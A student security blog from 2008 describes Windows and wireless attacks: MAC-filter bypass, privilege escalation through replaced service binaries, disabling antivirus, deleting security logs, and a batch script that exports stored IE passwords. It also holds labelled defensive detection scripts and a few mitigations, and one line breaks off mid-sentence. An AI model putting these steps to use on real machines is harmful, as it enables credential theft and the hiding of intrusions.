Monday, February 25, 2008

Why MAC filtering is poor wireless security

MAC filtering on a wireless access point is easily bypassed. Many organizations use MAC filtering as a means of keeping non-paying customers off of their wireless network. I have seen 2 basic implementations of this:
1. The device can't read or pass any traffic across the network unless its MAC is in the list.
2. The device can read but can't pass traffic (except ARP/DHCP) across the network unless its MAC is in the list.

Both 1 and 2 can be bypassed by using Kismet to list the connected devices. The attacker then spoofs his MAC to look like an authenticated device. 2 can also be bypassed by connecting to the access point and using Wireshark to see which devices are sending TCP traffic. Once again the attacker spoofs his MAC address to look like a device that is sending TCP traffic.
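As an added example that is not part of the original post, and going a step beyond it: the spoofing described above means two radios transmit with one address, and that is visible on the air because each 802.11 sender keeps its own sequence counter. The frame list is constructed; a real one would come from a monitor-mode capture (assumed: source address and sequence number fields such as tshark's wlan.sa and wlan.seq).

```powershell
# Added example, not from the original post: flag a MAC address that two radios
# are using at once. Input is a constructed list of "source MAC,sequence number".
$frames = @(
    '00:11:22:33:44:55,1001', '00:11:22:33:44:55,1002', '00:11:22:33:44:55,17',
    '00:11:22:33:44:55,1003', '00:11:22:33:44:55,18',   '00:11:22:33:44:55,1004',
    'aa:bb:cc:dd:ee:ff,4093', 'aa:bb:cc:dd:ee:ff,4094', 'aa:bb:cc:dd:ee:ff,4095',
    'aa:bb:cc:dd:ee:ff,0'
) | ForEach-Object {
    $mac, $seq = $_ -split ','
    [pscustomobject]@{ Mac = $mac; Seq = [int]$seq }
}

function Find-SharedMac {
    param([object[]]$Frames, [int]$Threshold = 2)
    # An 802.11 sender increments a 12-bit sequence counter per frame (wrapping
    # at 4096). One radio never moves it backwards, so repeated large backward
    # jumps on a single address mean a second transmitter is using that address.
    $last = @{}
    $regressions = @{}
    foreach ($f in $Frames) {
        if ($last.ContainsKey($f.Mac)) {
            $delta = ($f.Seq - $last[$f.Mac] + 4096) % 4096
            # A normal wrap (4095 -> 0) is a small forward delta; a delta above
            # half the counter range can only be a backward jump.
            if ($delta -gt 2048) { $regressions[$f.Mac] = 1 + [int]$regressions[$f.Mac] }
        }
        $last[$f.Mac] = $f.Seq
    }
    foreach ($mac in $regressions.Keys) {
        if ($regressions[$mac] -ge $Threshold) {
            [pscustomobject]@{ Mac = $mac; BackwardJumps = $regressions[$mac] }
        }
    }
}

Find-SharedMac -Frames $frames | Format-Table -AutoSize
```

On the constructed frames only 00:11:22:33:44:55 is reported (two backward jumps); the second address merely wrapped its counter.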

Wireless Cracking Help

It can be really painful to try and get the right card, driver, and wireless tools working together. I have found that the Backtrack security suite makes this a little easier. They have added most of the drivers you need to their distro. Backtrack even detects and configures your card for you on bootup. I have tried Backtrack with many different PCMCIA wireless cards and almost all of them have worked. I picked up an Orinoco Gold card off of eBay for $30. This card is obviously a knock-off, but it was cheap and it uses the same firmware. It also has an external antenna adapter that I can attach to my cantenna. The card has actually worked pretty well for me. But the Backtrack suite is my tool of choice for cracking wireless networks. It does a great job of bringing the drivers and the tools together.

War Drive in Provo

Since the Home Depot and TJ Maxx incidents there has been a lot of talk about wireless security at retail stores. It was insecure wireless networks at these two stores that allowed hackers to gain access to the "secure" internal corporate network. I was curious about this and decided to see for myself, except I decided to look at private home networks instead. I used my Orinoco Gold card and NetStumbler to conduct my experiment. I drove through some of the residential areas of Provo, Utah counting the number of secure vs. insecure access points. I did the same in Idaho Falls, Idaho. I was amazed to find that in Provo 46% of the access points had no security enabled and in Idaho Falls 51% of the access points had no security enabled. The statistics may vary, but I think they are quite telling. Something really needs to be done to help protect the general public. (Note: I did not attempt to access any of the networks in this test. That would be unethical and potentially illegal.)

Wednesday, February 20, 2008

Elevate any account to administrator

This is kind of a cheap shot because you can do almost anything by booting to another OS. But it is possible to elevate your account to an administrative account simply by booting to another OS like Knoppix and using a number of strategies. One method of doing this is:
1. Create an exe that executes a command like "net user localgroup administrators /add "
2. Boot into Knoppix from a CD or flash drive and mount the Windows system drive as writable.
3. Replace an exe on the system that will be run under the system account with your exe.
4. Boot into Windows and log in. As soon as the service is run it will elevate your account.

This is one of many attacks that can be executed this way.

Attack mitigation:

Create a BIOS or, if possible, hard disk password and disallow CD/USB boot.

From Admin to System user

This can be done with one command. As administrator open a command prompt. Type "at

Disable Symantec Antivirus

It is nearly impossible to stop Symantec Antivirus. Even after all Symantec services are stopped it still continues to scan. This is because it continues to run from a rooted directory located at program files\symantec antivirus\OEM. But it is possible to disable Symantec.
1. Stop the Symantec Antivirus service
2. Stop the DefWatch service
3. Rename the \program files\common files\symantec shared\virusdefs directory

Symantec will continue to scan but it won't be able to find its virus definitions. Symantec will correct itself at the next LiveUpdate, so this is not a long-term hack. This will also cause Symantec to log system errors and tamper errors.

Tuesday, February 19, 2008

How to elevate Windows Power user to Administrator

This one has been a real eye-opening project for me. In order to minimize administrative burden many organizations use the Power Users group. The power user does have limited privileges, but this only gives a false sense of security. It is extremely easy for a power user to elevate themselves to an administrative user. It is this easy:

1. Find a service that runs as the system user and can be written to by the Power Users group (e.g. many Symantec services).
2. Program an exe that adds your user to the Administrators group.
3. Stop the service.
4. Replace the service exe with your exe.
5. Restart the service.
6. Run net localgroup administrators. Look, you are now an administrator.
7. Log in again.

Attack mitigation:

Don't use Power Users.
Remove Power Users write privileges on all services that run under an elevated user account (impossible).
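The condition that step 1 of this post and the service-replacement step of the Knoppix post both rely on is auditable. As an added example that is not part of the original post, the following read-only check lists services that run as a privileged built-in account and whose executable a low-privilege group may modify. It assumes Windows PowerShell 3 or later (for Get-CimInstance) and an elevated shell so every binary's ACL is readable.

```powershell
# Added example, not from the original post: read-only audit of service binaries
# writable by low-privilege groups. Reports only; it changes nothing.
function Get-WritableServiceBinaries {
    $weakPrincipals = 'BUILTIN\Users', 'BUILTIN\Power Users', 'Everyone',
                      'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    # Any of these rights lets the file be replaced or its ACL loosened.
    $writeBits = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        # Only services running under a privileged built-in account matter here.
        if ($svc.StartName -notmatch '^(LocalSystem|NT AUTHORITY\\(SYSTEM|LocalService|NetworkService))$') { return }
        # PathName may be quoted and may carry arguments; recover the executable.
        # An unquoted path with spaces and arguments is skipped by the Test-Path check.
        $exe = $svc.PathName
        if ($exe -match '^"([^"]+)"') { $exe = $Matches[1] }
        elseif ($exe -match '^(\S+\.exe)') { $exe = $Matches[1] }
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
        foreach ($ace in (Get-Acl -LiteralPath $exe).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            # Generic rights (e.g. GENERIC_WRITE) appear as raw bits and are not
            # matched; an ACE carrying only read/execute bits is skipped.
            if (([int]$ace.FileSystemRights -band $writeBits) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Binary    = $exe
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Get-WritableServiceBinaries | Format-Table -AutoSize
```

Every row is a binary whose ACL should be tightened to SYSTEM and Administrators; an empty result on a given machine is the state the mitigation above asks for.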

Friday, February 15, 2008

Erase windows security log

The security log can't be deleted while the Event Log service is running. Set the "Event Log" service to disabled and restart the machine. Then delete the file "\windows\system32\config\SecEvent.evt". The values in this file can also be changed with a hex editor. Reset the Event Log service to automatic and it will restart the next time the machine restarts.
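Three read-only checks a defender can run for the tampering described above, added here as an example that is not part of the original post. It assumes a current Windows (Get-WinEvent needs Vista or later, where the file is Security.evtx rather than SecEvent.evt) and an elevated shell, which reading the Security log requires. The caveat worth knowing: a clear done through the API leaves a "log cleared" event in the fresh log, but deleting the file while the service is stopped leaves neither that event nor the old records, so the service state and the age of the oldest record are the only on-box signals.

```powershell
# Added example, not from the original post: look for signs that the Security
# log was disabled, cleared or replaced on disk.
function Test-SecurityLogTampering {
    $findings = @()
    # 1. The service must be running and set to start automatically.
    $svc = Get-CimInstance Win32_Service -Filter "Name='EventLog'"
    if ($svc.StartMode -ne 'Auto' -or $svc.State -ne 'Running') {
        $findings += "Event Log service is $($svc.State) with start mode $($svc.StartMode)"
    }
    # 2. A clear through the API records event 517 (XP) / 1102 (Vista and later).
    $cleared = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 517, 1102 } -MaxEvents 5 -ErrorAction SilentlyContinue
    foreach ($e in $cleared) {
        $findings += "Security log cleared at $($e.TimeCreated) (event $($e.Id))"
    }
    # 3. Heuristic for the file-deletion case: a Security log whose oldest record
    #    is newer than the last boot has been replaced, or has rolled over since
    #    boot, which is only plausible for a small log on a busy machine.
    $oldest = Get-WinEvent -LogName Security -Oldest -MaxEvents 1 -ErrorAction SilentlyContinue
    $boot = (Get-CimInstance Win32_OperatingSystem).LastBootUpTime
    if ($oldest -and $oldest.TimeCreated -gt $boot) {
        $findings += "Oldest Security record ($($oldest.TimeCreated)) is newer than last boot ($boot)"
    }
    if ($findings.Count -eq 0) { 'No sign of Security log tampering' } else { $findings }
}

Test-SecurityLogTampering
```

Forwarding the Security log off the machine is the only check that survives all three steps of the post, since the copy the attacker deletes is then not the only copy.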

Thursday, February 14, 2008

Exporting IE password files to another computer

There is nothing stopping an attacker from exporting IE password files to another machine. This would be useful if a program like Symantec were stopping you from using other tools on the local machine. All an attacker needs is a jump drive or other portable storage device. A script can be created that saves the encrypted registry values to their flash drive. Then they can import the passwords onto their own machine and use tools to decrypt the passwords. This is a copy of my script:

@ echo off
REM search for storage2 in ie7
mkdir ie_info
mkdir ie_info\%computername%
regedit /E ie_info\%computername%\ie7.reg "HKEY_USERS" > NUL
regedit /E ie_info\%computername%\ie6.reg "HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider\" > NUl

The IE 7 passwords are stored in the following path:

HKEY_USERS\\Software\Microsoft\Internet Explorer\IntelliForms\Storage2

How to delete Symantec Antivirus Logs

Because there are no locks on Symantec logs, they can be easily deleted. The logs are stored in two different places in Windows XP: \Documents and Settings\\Local Settings\Application Data\Symantec\Symantec AntiVirus Corporate Edition\\Logs and \Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\\Logs. This may not seem very important, but it can be used by an attacker to cover up failed attempts to use hack tools on a machine.

Solution

Deny write and delete access to non-system/administrative users.

Tuesday, February 5, 2008

How to recover saved firefox passwords

There are many different software packages on the market designed to recover saved Firefox passwords. In this article I will explain how to view saved Firefox passwords without any special software. We will let Firefox do all the work for us.

Method 1:
If you have access to the Windows account where the passwords are saved then the solution can be simple. Open Firefox and go to tools>options>security>show passwords. This will list all of the accounts with saved passwords. If you click the show passwords button it will display all of the corresponding passwords.

Method 2:
This method is a little more advanced, but can be used to recover the passwords of any account on the machine. The passwords are saved in the directory \Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\. The files that store the passwords are signons2.txt and keys3.db. If these files are taken and put in the above path on another machine they can be viewed using method 1. The password is recovered and no fancy software was needed.

Attack Mitigation:

Use a master password in your Firefox browser. Go to Firefox>tools>options>security and check the use master password box. This will cause Firefox to ask for a master password before displaying the saved passwords. There are some software packages capable of recovering the passwords even with the master password set, but this will stop casual hackers.

About me and My blog

My name is Craig Marshall. I am a student at BYU in the Information Systems department. I am interested in computer security and digital forensics. Upon graduation I will be working as a penetration tester for Ernst and Young's Advanced Security Center. This is a running log of my research and findings. (Note: All of my research is done in my own controlled test environment. I do not attack other people's machines!)